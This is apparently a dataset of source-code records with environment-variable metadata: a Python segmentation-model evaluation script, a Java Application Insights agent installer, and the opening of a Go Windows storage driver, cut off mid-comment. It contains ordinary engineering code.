source_data = 'wubowen/' + args.data_root
sync_source_dir = os.path.join(get_data_paths()['ssd20'], source_data)
sync_dest_dir = os.path.join(get_data_paths()['host-path'], os.path.dirname(source_data))
# if not os.path.exists(sync_dest_dir):
cmd_line = "mkdir -p {0}".format(sync_dest_dir)
subprocess.call(cmd_line.split())
# data_dir = os.path.join(get_data_paths()['host-path'], source_data)
# if not os.path.exists(data_dir):
cmd_line = "rsync -r {0} {1}".format(sync_source_dir, sync_dest_dir)
subprocess.call(cmd_line.split())
return sync_dest_dir
def local_data_prepare():
args.data_root = os.path.join(args.local_prefix, args.data_root)
args.train_list = os.path.join(args.local_prefix, args.train_list)
args.val_list = os.path.join(args.local_prefix, args.val_list)
args.test_list = os.path.join(args.local_prefix, args.test_list)
def main():
global args, logger
args = get_parser()
check(args)
# if args.polyaxon:
# polyaxon_data_prepare()
# else:
local_data_prepare()
logger = get_logger()
os.environ["CUDA_VISIBLE_DEVICES"] = ','.join(str(x) for x in args.test_gpu)
logger.info(args)
logger.info("=> creating model ...")
logger.info("Classes: {}".format(args.classes))
value_scale = 255
mean = [0.485, 0.456, 0.406]
mean = [item * value_scale for item in mean]
std = [0.229, 0.224, 0.225]
std = [item * value_scale for item in std]
gray_folder = os.path.join(args.save_folder, 'gray')
color_folder = os.path.join(args.save_folder, 'color')
test_transform = transform.Compose([transform.ToTensor()])
test_data = dataset.SemData(split=args.split, data_root=args.data_root, data_list=args.test_list, transform=test_transform)
index_start = args.index_start
if args.index_step == 0:
index_end = len(test_data.data_list)
else:
index_end = min(index_start + args.index_step, len(test_data.data_list))
test_data.data_list = test_data.data_list[index_start:index_end]
test_loader = torch.utils.data.DataLoader(test_data, batch_size=1, shuffle=False, num_workers=args.workers, pin_memory=True)
colors = np.loadtxt(args.colors_path).astype('uint8')
names = [line.rstrip('\n') for line in open(args.names_path)]
if not args.has_prediction:
if args.arch == 'psp':
from model.pspnet import PSPNet
model = PSPNet(layers=args.layers, classes=args.classes, zoom_factor=args.zoom_factor, pretrained=False, concatenate=args.concatenate)
elif args.arch == 'psptrans':
from model.psptrans import PSPNet
model = PSPNet(layers=args.layers, classes=args.classes, zoom_factor=args.zoom_factor, pretrained=False)
elif args.arch == 'psa':
from model.psanet import PSANet
model = PSANet(layers=args.layers, classes=args.classes, zoom_factor=args.zoom_factor, compact=args.compact,
shrink_factor=args.shrink_factor, mask_h=args.mask_h, mask_w=args.mask_w,
normalization_factor=args.normalization_factor, psa_softmax=args.psa_softmax,
pretrained=False)
elif args.arch == 'deeplabv2':
from model.deeplabv2 import Resnet101_deeplab
print("args.pretrain data=" + args.pretrain_data)
# import ipdb; ipdb.set_trace(context=20)
model = Resnet101_deeplab(num_classes=args.classes, pretrained=True,
pretrain_data=args.pretrain_data)
modules_ori = model.pretrained_layers()
modules_new = model.new_layers()
# logger.info(model)
model = torch.nn.DataParallel(model).cuda()
cudnn.benchmark = True
if os.path.isfile(args.model_path):
logger.info("=> loading checkpoint '{}'".format(args.model_path))
checkpoint = torch.load(args.model_path)
model.load_state_dict(checkpoint['state_dict'], strict=False)
logger.info("=> loaded checkpoint '{}'".format(args.model_path))
else:
raise RuntimeError("=> no checkpoint found at '{}'".format(args.model_path))
# if args.test_adabn:
# target_transform = transform.Compose([
# # target_transform = Compose([
# transform.RandScale([args.scale_min, args.scale_max]),
# transform.RandRotate([args.rotate_min, args.rotate_max], padding=mean, ignore_label=args.ignore_label),
# transform.RandomGaussianBlur(),
# transform.RandomHorizontalFlip(),
# transform.Crop([args.train_h, args.train_w], crop_type='rand', padding=mean,
# ignore_label=args.ignore_label),
# transform.ToTensor(),
# transform.Normalize(mean=mean, std=std)])
# target_ds = dataset.SemData(split='train', data_root=args.data_root,
# data_list=args.train_labeled_list,
# transform=target_transform)
# target_sampler = None
# target_loader = torch.utils.data.DataLoader(target_ds, batch_size=args.batch_size_adabn,
# shuffle=(target_sampler is None),
# num_workers=args.workers, pin_memory=True,
# sampler=target_sampler,
# drop_last=True)
# from util.reader import DataReader
# reader = DataReader(target_loader)
# adabn(model, reader=reader, iterations=1000, args=args)
test(test_loader, test_data.data_list, model, args.classes, mean, std, args.base_size, args.test_h, args.test_w, args.scales, gray_folder, color_folder, colors)
if args.split != 'test':
cal_acc(test_data.data_list, gray_folder, args.classes, names)
print(args.model_path)
print('\n')
print('\n')
def net_process(model, image, mean, std=None, flip=True):
input = torch.from_numpy(image.transpose((2, 0, 1))).float()
if std is None:
for t, m in zip(input, mean):
t.sub_(m)
else:
for t, m, s in zip(input, mean, std):
t.sub_(m).div_(s)
input = input.unsqueeze(0).cuda()
if flip:
input = torch.cat([input, input.flip(3)], 0)
with torch.no_grad():
output = model(input)
_, _, h_i, w_i = input.shape
_, _, h_o, w_o = output.shape
if (h_o != h_i) or (w_o != w_i):
output = F.interpolate(output, (h_i, w_i), mode='bilinear', align_corners=True)
output = F.softmax(output, dim=1)
if flip:
output = (output[0] + output[1].flip(2)) / 2
else:
output = output[0]
output = output.data.cpu().numpy()
output = output.transpose(1, 2, 0)
return output
def scale_process(model, image, classes, crop_h, crop_w, h, w, mean, std=None, stride_rate=2/3):
ori_h, ori_w, _ = image.shape
pad_h = max(crop_h - ori_h, 0)
pad_w = max(crop_w - ori_w, 0)
pad_h_half = int(pad_h / 2)
pad_w_half = int(pad_w / 2)
if pad_h > 0 or pad_w > 0:
image = cv2.copyMakeBorder(image, pad_h_half, pad_h - pad_h_half, pad_w_half, pad_w - pad_w_half, cv2.BORDER_CONSTANT, value=mean)
new_h, new_w, _ = image.shape
stride_h = int(np.ceil(crop_h*stride_rate))
stride_w = int(np.ceil(crop_w*stride_rate))
grid_h = int(np.ceil(float(new_h-crop_h)/stride_h) + 1)
grid_w = int(np.ceil(float(new_w-crop_w)/stride_w) + 1)
prediction_crop = np.zeros((new_h, new_w, classes), dtype=float)
count_crop = np.zeros((new_h, new_w), dtype=float)
for index_h in range(0, grid_h):
for index_w in range(0, grid_w):
s_h = index_h * stride_h
e_h = min(s_h + crop_h, new_h)
s_h = e_h - crop_h
s_w = index_w * stride_w
e_w = min(s_w + crop_w, new_w)
s_w = e_w - crop_w
image_crop = image[s_h:e_h, s_w:e_w].copy()
count_crop[s_h:e_h, s_w:e_w] += 1
prediction_crop[s_h:e_h, s_w:e_w, :] += net_process(model, image_crop, mean, std)
prediction_crop /= np.expand_dims(count_crop, 2)
prediction_crop = prediction_crop[pad_h_half:pad_h_half+ori_h, pad_w_half:pad_w_half+ori_w]
prediction = cv2.resize(prediction_crop, (w, h), interpolation=cv2.INTER_LINEAR)
return prediction
def adabn(model, reader, iterations, args):
logger.info('>>>>>>>>>>>>>>>> Start Adabn >>>>>>>>>>>>>>>>')
data_time = AverageMeter()
batch_time = AverageMeter()
model.train()
end = time.time()
# for i, (input, target) in enumerate(loader):
for i in range(iterations):
input, target = reader.read_data()
input = input.cuda(non_blocking=True) # input.shape= Bx3xHxW
target = target.cuda(non_blocking=True) # TARGET.shape= BxHxW
# import ipdb;ipdb.set_trace(context=20)
data_time.update(time.time() - end)
if args.zoom_factor != 8:
h = int((target.size()[1] - 1) / 8 * args.zoom_factor + 1)
w = int((target.size()[2] - 1) / 8 * args.zoom_factor + 1)
# 'nearest' mode doesn't support align_corners mode and 'bilinear' mode is fine for downsampling
target = F.interpolate(target.unsqueeze(1).float(), size=(h, w), mode='bilinear',
align_corners=True).squeeze(1).long()
input = input.cuda(non_blocking=True) # input.shape= Bx3xHxW
target = target.cuda(non_blocking=True) # TARGET.shape= BxHxW
output_pred, main_loss, aux_loss = model(input, target, sup_loss_method=args.sup_loss_method)
batch_time.update(time.time() - end)
end = time.time()
if ((i + 1) % 10 == 0):
logger.info('adabn: [{}/{}] '
'Data {data_time.val:.3f} ({data_time.avg:.3f}) '
'Batch {batch_time.val:.3f} ({batch_time.avg:.3f}).'.format(i + 1, iterations,
data_time=data_time,
batch_time=batch_time))
def test(test_loader, data_list, model, classes, mean, std, base_size, crop_h, crop_w, scales, gray_folder, color_folder, colors):
logger.info('>>>>>>>>>>>>>>>> Start Evaluation >>>>>>>>>>>>>>>>')
data_time = AverageMeter()
batch_time = AverageMeter()
model.eval()
end = time.time()
for i, (input, _) in enumerate(test_loader):
data_time.update(time.time() - end)
input = np.squeeze(input.numpy(), axis=0)
image = np.transpose(input, (1, 2, 0))
h, w, _ = image.shape
prediction = np.zeros((h, w, classes), dtype=float)
for scale in scales:
long_size = round(scale * base_size)
new_h = long_size
new_w = long_size
if h > w:
new_w = round(long_size/float(h)*w)
else:
new_h = round(long_size/float(w)*h)
image_scale = cv2.resize(image, (new_w, new_h), interpolation=cv2.INTER_LINEAR)
prediction += scale_process(model, image_scale, classes, crop_h, crop_w, h, w, mean, std)
prediction /= len(scales)
prediction = np.argmax(prediction, axis=2)
batch_time.update(time.time() - end)
end = time.time()
if ((i + 1) % 10 == 0) or (i + 1 == len(test_loader)):
logger.info('Test: [{}/{}] '
'Data {data_time.val:.3f} ({data_time.avg:.3f}) '
'Batch {batch_time.val:.3f} ({batch_time.avg:.3f}).'.format(i + 1, len(test_loader),
data_time=data_time,
batch_time=batch_time))
check_makedirs(gray_folder)
check_makedirs(color_folder)
gray = np.uint8(prediction)
color = colorize(gray, colors)
if args.split == 'test' and args.pseudo_data == 'cityscapes':
# ---- trainid to id
for trainid in range(args.classes):
trainid = 18-trainid
id = trainid2id[trainid]
gray[gray == trainid] = id
# import ipdb; ipdb.set_trace(context=20)
image_path, _ = data_list[i]
image_name = image_path.split('/')[-1].split('.')[0]
gray_path = os.path.join(gray_folder, image_name + '.png')
color_path = os.path.join(color_folder, image_name + '.png')
cv2.imwrite(gray_path, gray)
# color.save(color_path)
logger.info('<<<<<<<<<<<<<<<<< End Evaluation <<<<<<<<<<<<<<<<<')
def cal_acc(data_list, pred_folder, classes, names):
intersection_meter = AverageMeter()
union_meter = AverageMeter()
target_meter = AverageMeter()
for i, (image_path, target_path) in enumerate(data_list):
image_name = image_path.split('/')[-1].split('.')[0]
pred = cv2.imread(os.path.join(pred_folder, image_name+'.png'), cv2.IMREAD_GRAYSCALE)
target = cv2.imread(target_path, cv2.IMREAD_GRAYSCALE)
intersection, union, target = intersectionAndUnion(pred, target, classes)
intersection_meter.update(intersection)
union_meter.update(union)
target_meter.update(target)
accuracy = sum(intersection_meter.val) / (sum(target_meter.val) + 1e-10)
logger.info('Evaluating {0}/{1} on image {2}, accuracy {3:.4f}.'.format(i + 1, len(data_list), image_name+'.png', accuracy))
iou_class = intersection_meter.sum / (union_meter.sum + 1e-10)
accuracy_class = intersection_meter.sum / (target_meter.sum + 1e-10)
mIoU = np.mean(iou_class)
mAcc = np.mean(accuracy_class)
allAcc = sum(intersection_meter.sum) / (sum(target_meter.sum) + 1e-10)
logger.info('Eval result: mIoU/mAcc/allAcc {:.4f}/{:.4f}/{:.4f}.'.format(mIoU, mAcc, allAcc))
for i in range(classes):
logger.info('Class_{} result: iou/accuracy {:.4f}/{:.4f}, name: {}.'.format(i, iou_class[i], accuracy_class[i], names[i]))
for i in range(classes):
print(iou_class[i])
if __name__ == '__main__':
main()
| [] | [] | ["CUDA_VISIBLE_DEVICES"] | [] | ["CUDA_VISIBLE_DEVICES"] | python | 1 | 0 | |
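The scale_process routine in the test script slides a fixed crop over the padded image with a stride of crop_size * 2/3 and averages overlapping predictions. The window arithmetic on its own, as a small sketch; it assumes the image is already at least crop x crop, which the padding step above guarantees:
import math

def crop_windows(height, width, crop, stride_rate=2 / 3):
    """Yield (s_h, e_h, s_w, e_w) crop coordinates the way the grid loop above computes them."""
    stride = int(math.ceil(crop * stride_rate))
    grid_h = int(math.ceil(float(height - crop) / stride) + 1)
    grid_w = int(math.ceil(float(width - crop) / stride) + 1)
    for ih in range(grid_h):
        e_h = min(ih * stride + crop, height)
        s_h = e_h - crop
        for iw in range(grid_w):
            e_w = min(iw * stride + crop, width)
            s_w = e_w - crop
            yield s_h, e_h, s_w, e_w

# Example: 713x713 crops over a 1024x2048 image.
print(len(list(crop_windows(1024, 2048, 713))))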
agent/agent-tooling/src/main/java/com/microsoft/applicationinsights/agent/internal/AiComponentInstaller.java
|
/*
* ApplicationInsights-Java
* Copyright (c) Microsoft Corporation
* All rights reserved.
*
* MIT License
* Permission is hereby granted, free of charge, to any person obtaining a copy of this
* software and associated documentation files (the ""Software""), to deal in the Software
* without restriction, including without limitation the rights to use, copy, modify, merge,
* publish, distribute, sublicense, and/or sell copies of the Software, and to permit
* persons to whom the Software is furnished to do so, subject to the following conditions:
* The above copyright notice and this permission notice shall be included in all copies or
* substantial portions of the Software.
* THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,
* INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR
* PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE
* FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
* OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
* DEALINGS IN THE SOFTWARE.
*/
package com.microsoft.applicationinsights.agent.internal;
import com.google.common.base.Strings;
import com.microsoft.applicationinsights.TelemetryClient;
import com.microsoft.applicationinsights.TelemetryConfiguration;
import com.microsoft.applicationinsights.agent.bootstrap.BytecodeUtil;
import com.microsoft.applicationinsights.agent.bootstrap.diagnostics.DiagnosticsHelper;
import com.microsoft.applicationinsights.agent.bootstrap.diagnostics.SdkVersionFinder;
import com.microsoft.applicationinsights.agent.internal.instrumentation.sdk.ApplicationInsightsAppenderClassFileTransformer;
import com.microsoft.applicationinsights.agent.internal.instrumentation.sdk.BytecodeUtilImpl;
import com.microsoft.applicationinsights.agent.internal.instrumentation.sdk.DependencyTelemetryClassFileTransformer;
import com.microsoft.applicationinsights.agent.internal.instrumentation.sdk.HeartBeatModuleClassFileTransformer;
import com.microsoft.applicationinsights.agent.internal.instrumentation.sdk.PerformanceCounterModuleClassFileTransformer;
import com.microsoft.applicationinsights.agent.internal.instrumentation.sdk.QuickPulseClassFileTransformer;
import com.microsoft.applicationinsights.agent.internal.instrumentation.sdk.RequestTelemetryClassFileTransformer;
import com.microsoft.applicationinsights.agent.internal.instrumentation.sdk.TelemetryClientClassFileTransformer;
import com.microsoft.applicationinsights.agent.internal.instrumentation.sdk.WebRequestTrackingFilterClassFileTransformer;
import com.microsoft.applicationinsights.agent.internal.wasbootstrap.MainEntryPoint;
import com.microsoft.applicationinsights.agent.internal.wasbootstrap.configuration.Configuration;
import com.microsoft.applicationinsights.agent.internal.wasbootstrap.configuration.Configuration.JmxMetric;
import com.microsoft.applicationinsights.agent.internal.wasbootstrap.configuration.Configuration.ProcessorConfig;
import com.microsoft.applicationinsights.agent.internal.wasbootstrap.configuration.Configuration.ProfilerConfiguration;
import com.microsoft.applicationinsights.agent.internal.wasbootstrap.configuration.RpConfiguration;
import com.microsoft.applicationinsights.common.CommonUtils;
import com.microsoft.applicationinsights.customExceptions.FriendlyException;
import com.microsoft.applicationinsights.extensibility.initializer.ResourceAttributesContextInitializer;
import com.microsoft.applicationinsights.extensibility.initializer.SdkVersionContextInitializer;
import com.microsoft.applicationinsights.internal.channel.common.LazyHttpClient;
import com.microsoft.applicationinsights.internal.config.AddTypeXmlElement;
import com.microsoft.applicationinsights.internal.config.ApplicationInsightsXmlConfiguration;
import com.microsoft.applicationinsights.internal.config.JmxXmlElement;
import com.microsoft.applicationinsights.internal.config.ParamXmlElement;
import com.microsoft.applicationinsights.internal.config.TelemetryConfigurationFactory;
import com.microsoft.applicationinsights.internal.config.TelemetryModulesXmlElement;
import com.microsoft.applicationinsights.internal.config.connection.ConnectionString;
import com.microsoft.applicationinsights.internal.config.connection.InvalidConnectionStringException;
import com.microsoft.applicationinsights.internal.profiler.GcEventMonitor;
import com.microsoft.applicationinsights.internal.profiler.ProfilerServiceInitializer;
import com.microsoft.applicationinsights.internal.statsbeat.StatsbeatModule;
import com.microsoft.applicationinsights.internal.system.SystemInformation;
import com.microsoft.applicationinsights.internal.util.PropertyHelper;
import com.microsoft.applicationinsights.profiler.config.ServiceProfilerServiceConfig;
import io.opentelemetry.instrumentation.api.aisdk.AiLazyConfiguration;
import io.opentelemetry.javaagent.spi.ComponentInstaller;
import org.apache.http.HttpHost;
import org.checkerframework.checker.nullness.qual.Nullable;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import java.io.File;
import java.lang.instrument.Instrumentation;
import java.net.URI;
import java.util.ArrayList;
import java.util.concurrent.CountDownLatch;
import static java.util.concurrent.TimeUnit.MINUTES;
import static java.util.concurrent.TimeUnit.SECONDS;
public class AiComponentInstaller implements ComponentInstaller {
private static final Logger startupLogger = LoggerFactory.getLogger("com.microsoft.applicationinsights.agent");
// TODO move to "agent builder" and then can inject this in the constructor
// or convert to ByteBuddy and use ByteBuddyAgentCustomizer
private static Instrumentation instrumentation;
public static void setInstrumentation(Instrumentation inst) {
instrumentation = inst;
}
@Override
public void beforeByteBuddyAgent() {
start(instrumentation);
// add sdk instrumentation after ensuring Global.getTelemetryClient() will not return null
instrumentation.addTransformer(new TelemetryClientClassFileTransformer());
instrumentation.addTransformer(new DependencyTelemetryClassFileTransformer());
instrumentation.addTransformer(new RequestTelemetryClassFileTransformer());
instrumentation.addTransformer(new PerformanceCounterModuleClassFileTransformer());
instrumentation.addTransformer(new QuickPulseClassFileTransformer());
instrumentation.addTransformer(new HeartBeatModuleClassFileTransformer());
instrumentation.addTransformer(new ApplicationInsightsAppenderClassFileTransformer());
instrumentation.addTransformer(new WebRequestTrackingFilterClassFileTransformer());
instrumentation.addTransformer(new DuplicateAgentClassFileTransformer());
}
@Override
public void afterByteBuddyAgent() {
// only safe now to resolve app id because SSL initialization
// triggers loading of java.util.logging (starting with Java 8u231)
// and JBoss/Wildfly need to install their own JUL manager before JUL is initialized
AppIdSupplier.registerAndStartAppIdRetrieval();
}
private static void start(Instrumentation instrumentation) {
String codelessSdkNamePrefix = getCodelessSdkNamePrefix();
if (codelessSdkNamePrefix != null) {
PropertyHelper.setSdkNamePrefix(codelessSdkNamePrefix);
}
File javaTmpDir = new File(System.getProperty("java.io.tmpdir"));
File tmpDir = new File(javaTmpDir, "applicationinsights-java");
if (!tmpDir.exists() && !tmpDir.mkdirs()) {
throw new IllegalStateException("Could not create directory: " + tmpDir.getAbsolutePath());
}
Configuration config = MainEntryPoint.getConfiguration();
if (!hasConnectionStringOrInstrumentationKey(config)) {
if (!("java".equals(System.getenv("FUNCTIONS_WORKER_RUNTIME")))) {
throw new FriendlyException("No connection string or instrumentation key provided",
"Please provide connection string or instrumentation key.");
}
}
// Function to validate user provided processor configuration
validateProcessorConfiguration(config);
// FIXME do something with config
// FIXME set doNotWeavePrefixes = "com.microsoft.applicationinsights.agent."
// FIXME set tryToLoadInBootstrapClassLoader = "com.microsoft.applicationinsights.agent."
// (maybe not though, this is only needed for classes in :agent:agent-bootstrap)
String jbossHome = System.getenv("JBOSS_HOME");
if (!Strings.isNullOrEmpty(jbossHome)) {
// this is used to delay SSL initialization because SSL initialization triggers loading of
// java.util.logging (starting with Java 8u231)
// and JBoss/Wildfly need to install their own JUL manager before JUL is initialized
LazyHttpClient.safeToInitLatch = new CountDownLatch(1);
instrumentation.addTransformer(new JulListeningClassFileTransformer(LazyHttpClient.safeToInitLatch));
}
if (config.proxy.host != null) {
LazyHttpClient.proxy = new HttpHost(config.proxy.host, config.proxy.port);
}
AppIdSupplier appIdSupplier = AppIdSupplier.INSTANCE;
TelemetryConfiguration configuration = TelemetryConfiguration.getActiveWithoutInitializingConfig();
TelemetryConfigurationFactory.INSTANCE.initialize(configuration, buildXmlConfiguration(config));
configuration.getContextInitializers().add(new SdkVersionContextInitializer());
configuration.getContextInitializers().add(new ResourceAttributesContextInitializer(config.customDimensions));
try {
ConnectionString.updateStatsbeatConnectionString(config.internal.statsbeat.instrumentationKey, config.internal.statsbeat.endpoint, configuration);
} catch (InvalidConnectionStringException ex) {
startupLogger.warn("Statsbeat endpoint is invalid. {}", ex.getMessage());
}
Global.setSamplingPercentage(config.sampling.percentage);
final TelemetryClient telemetryClient = new TelemetryClient();
Global.setTelemetryClient(telemetryClient);
ProfilerServiceInitializer.initialize(
appIdSupplier::get,
SystemInformation.INSTANCE.getProcessId(),
formServiceProfilerConfig(config.preview.profiler),
configuration.getRoleInstance(),
// TODO this will not work with Azure Spring Cloud updating connection string at runtime
configuration.getInstrumentationKey(),
telemetryClient,
formApplicationInsightsUserAgent(),
formGcEventMonitorConfiguration(config.preview.gcEvents)
);
// this is for Azure Function Linux consumption plan support.
if ("java".equals(System.getenv("FUNCTIONS_WORKER_RUNTIME"))) {
AiLazyConfiguration.setAccessor(new LazyConfigurationAccessor());
}
// this is currently used by Micrometer instrumentation in addition to 2.x SDK
BytecodeUtil.setDelegate(new BytecodeUtilImpl());
Runtime.getRuntime().addShutdownHook(new Thread() {
@Override
public void run() {
startupLogger.debug("running shutdown hook");
try {
telemetryClient.flush();
telemetryClient.shutdown(5, SECONDS);
startupLogger.debug("completed shutdown hook");
} catch (InterruptedException e) {
startupLogger.debug("interrupted while flushing telemetry during shutdown");
} catch (Throwable t) {
startupLogger.debug(t.getMessage(), t);
}
}
});
RpConfiguration rpConfiguration = MainEntryPoint.getRpConfiguration();
if (rpConfiguration != null) {
RpConfigurationPolling.startPolling(rpConfiguration, config);
}
// initialize StatsbeatModule
StatsbeatModule.initialize(telemetryClient, config.internal.statsbeat.intervalSeconds, config.internal.statsbeat.featureIntervalSeconds);
}
private static GcEventMonitor.GcEventMonitorConfiguration formGcEventMonitorConfiguration(Configuration.GcEventConfiguration gcEvents) {
return new GcEventMonitor.GcEventMonitorConfiguration(gcEvents.reportingLevel);
}
private static String formApplicationInsightsUserAgent() {
String aiVersion = SdkVersionFinder.getTheValue();
String javaVersion = System.getProperty("java.version");
String osName = System.getProperty("os.name");
String arch = System.getProperty("os.arch");
String userName = "Microsoft-ApplicationInsights-Java-Profiler/" + aiVersion + " (Java/" + javaVersion + "; " + osName + "; " + arch + ")";
return userName;
}
private static ServiceProfilerServiceConfig formServiceProfilerConfig(ProfilerConfiguration configuration) {
URI serviceProfilerFrontEndPoint = TelemetryConfiguration.getActive().getEndpointProvider().getProfilerEndpoint();
return new ServiceProfilerServiceConfig(
configuration.configPollPeriodSeconds,
configuration.periodicRecordingDurationSeconds,
configuration.periodicRecordingIntervalSeconds,
serviceProfilerFrontEndPoint,
configuration.enabled,
configuration.memoryTriggeredSettings,
configuration.cpuTriggeredSettings
);
}
private static void validateProcessorConfiguration(Configuration config) throws FriendlyException {
if (config.preview == null || config.preview.processors == null) return;
for (ProcessorConfig processorConfig : config.preview.processors) {
processorConfig.validate();
}
}
@Nullable
private static String getCodelessSdkNamePrefix() {
if (!DiagnosticsHelper.isRpIntegration()) {
return null;
}
StringBuilder sdkNamePrefix = new StringBuilder(4);
sdkNamePrefix.append(DiagnosticsHelper.rpIntegrationChar());
if (SystemInformation.INSTANCE.isWindows()) {
sdkNamePrefix.append("w");
} else if (SystemInformation.INSTANCE.isUnix()) {
sdkNamePrefix.append("l");
} else {
startupLogger.warn("could not detect os: {}", System.getProperty("os.name"));
sdkNamePrefix.append("u");
}
sdkNamePrefix.append("r_"); // "r" is for "recommended"
return sdkNamePrefix.toString();
}
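// Illustrative example (assumed values, documentation only): on a Linux-based
// resource-provider integration this yields a 4-character prefix of the form
//   rpIntegrationChar() + 'l' + "r_"   e.g. "Xlr_"
// which start() then passes to PropertyHelper.setSdkNamePrefix(...) above.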
private static boolean hasConnectionStringOrInstrumentationKey(Configuration config) {
return !Strings.isNullOrEmpty(config.connectionString);
}
private static ApplicationInsightsXmlConfiguration buildXmlConfiguration(Configuration config) {
ApplicationInsightsXmlConfiguration xmlConfiguration = new ApplicationInsightsXmlConfiguration();
if (!Strings.isNullOrEmpty(config.connectionString)) {
xmlConfiguration.setConnectionString(config.connectionString);
}
if (!Strings.isNullOrEmpty(config.role.name)) {
xmlConfiguration.setRoleName(config.role.name);
}
if (!Strings.isNullOrEmpty(config.role.instance)) {
xmlConfiguration.setRoleInstance(config.role.instance);
} else {
String hostname = CommonUtils.getHostName();
xmlConfiguration.setRoleInstance(hostname == null ? "unknown" : hostname);
}
// configure heartbeat module
AddTypeXmlElement heartbeatModule = new AddTypeXmlElement();
heartbeatModule.setType("com.microsoft.applicationinsights.internal.heartbeat.HeartBeatModule");
// do not allow interval longer than 15 minutes, since we use the heartbeat data for usage telemetry
long intervalSeconds = Math.min(config.heartbeat.intervalSeconds, MINUTES.toSeconds(15));
heartbeatModule.getParameters().add(newParamXml("HeartBeatInterval", Long.toString(intervalSeconds)));
ArrayList<AddTypeXmlElement> modules = new ArrayList<>();
modules.add(heartbeatModule);
TelemetryModulesXmlElement modulesXml = new TelemetryModulesXmlElement();
modulesXml.setAdds(modules);
xmlConfiguration.setModules(modulesXml);
// configure custom jmx metrics
ArrayList<JmxXmlElement> jmxXmls = new ArrayList<>();
for (JmxMetric jmxMetric : config.jmxMetrics) {
JmxXmlElement jmxXml = new JmxXmlElement();
jmxXml.setName(jmxMetric.name);
jmxXml.setObjectName(jmxMetric.objectName);
jmxXml.setAttribute(jmxMetric.attribute);
jmxXmls.add(jmxXml);
}
xmlConfiguration.getPerformance().setJmxXmlElements(jmxXmls);
xmlConfiguration.getPerformance().setCollectionFrequencyInSec(config.preview.metricIntervalSeconds);
xmlConfiguration.getQuickPulse().setEnabled(config.preview.liveMetrics.enabled);
if (config.preview.developerMode) {
xmlConfiguration.getChannel().setDeveloperMode(true);
}
return xmlConfiguration;
}
private static ParamXmlElement newParamXml(String name, String value) {
ParamXmlElement paramXml = new ParamXmlElement();
paramXml.setName(name);
paramXml.setValue(value);
return paramXml;
}
}
|
[
"\"FUNCTIONS_WORKER_RUNTIME\"",
"\"JBOSS_HOME\"",
"\"FUNCTIONS_WORKER_RUNTIME\""
] |
[] |
[
"JBOSS_HOME",
"FUNCTIONS_WORKER_RUNTIME"
] |
[]
|
["JBOSS_HOME", "FUNCTIONS_WORKER_RUNTIME"]
|
java
| 2 | 0 | |
vendor/github.com/containers/storage/drivers/windows/windows.go
|
// +build windows
package windows
import (
"bufio"
"bytes"
"encoding/json"
"errors"
"fmt"
"io"
"io/ioutil"
"os"
"path"
"path/filepath"
"strconv"
"strings"
"sync"
"syscall"
"time"
"unsafe"
"github.com/Microsoft/go-winio"
"github.com/Microsoft/go-winio/archive/tar"
"github.com/Microsoft/go-winio/backuptar"
"github.com/Microsoft/hcsshim"
"github.com/containers/storage/drivers"
"github.com/containers/storage/pkg/archive"
"github.com/containers/storage/pkg/idtools"
"github.com/containers/storage/pkg/ioutils"
"github.com/containers/storage/pkg/longpath"
"github.com/containers/storage/pkg/reexec"
"github.com/containers/storage/pkg/system"
units "github.com/docker/go-units"
"github.com/sirupsen/logrus"
"golang.org/x/sys/windows"
)
// filterDriver is an HCSShim driver type for the Windows Filter driver.
const filterDriver = 1
var (
// mutatedFiles is a list of files that are mutated by the import process
// and must be backed up and restored.
mutatedFiles = map[string]string{
"UtilityVM/Files/EFI/Microsoft/Boot/BCD": "bcd.bak",
"UtilityVM/Files/EFI/Microsoft/Boot/BCD.LOG": "bcd.log.bak",
"UtilityVM/Files/EFI/Microsoft/Boot/BCD.LOG1": "bcd.log1.bak",
"UtilityVM/Files/EFI/Microsoft/Boot/BCD.LOG2": "bcd.log2.bak",
}
noreexec = false
)
// init registers the windows graph drivers to the register.
func init() {
graphdriver.Register("windowsfilter", InitFilter)
// DOCKER_WINDOWSFILTER_NOREEXEC allows for inline processing which makes
// debugging issues in the re-exec codepath significantly easier.
if os.Getenv("DOCKER_WINDOWSFILTER_NOREEXEC") != "" {
logrus.Warnf("WindowsGraphDriver is set to not re-exec. This is intended for debugging purposes only.")
noreexec = true
} else {
reexec.Register("docker-windows-write-layer", writeLayerReexec)
}
}
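// Debugging sketch (not required for normal operation): launching the daemon
// with DOCKER_WINDOWSFILTER_NOREEXEC set to any non-empty value, e.g.
//   set DOCKER_WINDOWSFILTER_NOREEXEC=1
// makes importLayer call writeLayer in-process instead of re-execing
// "docker-windows-write-layer", so a debugger can step straight into the
// layer-import path (see importLayer and writeLayer below).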
type checker struct {
}
func (c *checker) IsMounted(path string) bool {
return false
}
// Driver represents a windows graph driver.
type Driver struct {
// info stores the shim driver information
info hcsshim.DriverInfo
ctr *graphdriver.RefCounter
// it is safe for windows to use a cache here because it does not support
// restoring containers when the daemon dies.
cacheMu sync.Mutex
cache map[string]string
}
// InitFilter returns a new Windows storage filter driver.
func InitFilter(home string, options []string, uidMaps, gidMaps []idtools.IDMap) (graphdriver.Driver, error) {
logrus.Debugf("WindowsGraphDriver InitFilter at %s", home)
fsType, err := getFileSystemType(string(home[0]))
if err != nil {
return nil, err
}
if strings.ToLower(fsType) == "refs" {
return nil, fmt.Errorf("%s is on an ReFS volume - ReFS volumes are not supported", home)
}
if err := idtools.MkdirAllAs(home, 0700, 0, 0); err != nil {
return nil, fmt.Errorf("windowsfilter failed to create '%s': %v", home, err)
}
d := &Driver{
info: hcsshim.DriverInfo{
HomeDir: home,
Flavour: filterDriver,
},
cache: make(map[string]string),
ctr: graphdriver.NewRefCounter(&checker{}),
}
return d, nil
}
// win32FromHresult is a helper function to get the win32 error code from an HRESULT
func win32FromHresult(hr uintptr) uintptr {
if hr&0x1fff0000 == 0x00070000 {
return hr & 0xffff
}
return hr
}
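// Worked example: the HRESULT 0x80070005 (E_ACCESSDENIED) carries the
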